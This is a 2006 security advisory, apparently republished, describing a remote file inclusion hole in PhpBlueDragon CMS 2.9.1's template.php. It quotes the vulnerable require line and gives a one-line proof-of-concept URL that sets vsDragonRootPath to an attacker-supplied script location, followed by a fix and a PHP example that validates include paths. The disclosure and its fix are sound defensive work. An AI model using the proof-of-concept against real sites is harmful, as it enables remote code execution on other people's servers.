



2006-06-14 PhpBlueDragon CMS <= 2.9.1 (template.php) File Include Vulnerability
Rated as : High Risk

-----------------------------------------------------
Advisory id: FSA:015

Author:    Federico Fazzi
Date:      14/06/2006, 18:20
Synthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
Type:      high
Product:   http://phpbluedragon.net/
Patch:     unavailable
-----------------------------------------------------


1) Description:

The error occurs in template.php, line 23, where the include path is built from $vsDragonRootPath:

---
require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php");
---

2) Proof of concept:

http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/
(note: the value must end with a final slash (/))

3) Solution:

Sanitize $vsDragonRootPath before it is used in the require.
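
One way to apply that fix, as an added example (not code from the advisory or from PhpBlueDragon). The helper name pbd_resolve_include(), the demo directory and the sample root values are assumptions, and the three-level dirname() in the comment is inferred from the path in the proof-of-concept URL.

```php
<?php
// Added example, not PhpBlueDragon code; pbd_resolve_include() is hypothetical.

/**
 * Return the real path of $rootPath.$relative, or throw unless it is an
 * existing local file inside $trustedBase.
 */
function pbd_resolve_include(string $trustedBase, string $rootPath, string $relative): string
{
    $candidate = $rootPath . $relative;
    // Reject stream wrappers (http://, ftp://, php://, data: ...) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.-]+:#i', $candidate) || strpos($candidate, "\0") !== false) {
        throw new RuntimeException('not a local path');
    }
    $base   = realpath($trustedBase);
    $target = realpath($candidate);          // false when the file does not exist
    if ($base === false || $target === false) {
        throw new RuntimeException('target not found');
    }
    // Containment: the resolved file must live under the trusted base.
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('target outside application root');
    }
    return $target;
}

// In template.php (assumption: it sits three directories below the install
// root), line 23 would become:
//   $vsDragonRootPath = dirname(__DIR__, 3) . '/';   // from the filesystem, not the request
//   require pbd_resolve_include($vsDragonRootPath, $vsDragonRootPath,
//       'public_includes/pub_kernel/pbd_template_custom.php');

// Constructed demo tree so the block runs on its own.
$base = sys_get_temp_dir() . '/pbd_demo_' . getmypid();
$rel  = 'public_includes/pub_kernel/pbd_template_custom.php';
mkdir(dirname("$base/$rel"), 0700, true);
file_put_contents("$base/$rel", "<?php\n");

// Constructed values standing in for what $vsDragonRootPath might hold.
foreach (["$base/", 'http://remote.example/', sys_get_temp_dir() . '/'] as $root) {
    try {
        echo 'ALLOW  ', pbd_resolve_include($base, $root, $rel), "\n";
    } catch (RuntimeException $e) {
        echo "REJECT $root (", $e->getMessage(), ")\n";
    }
}
```

Independently of the code change, PHP's allow_url_include setting (off by default since PHP 5.2) controls whether include/require may load remote URLs at all.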
securitydot.net - 2006-06-14
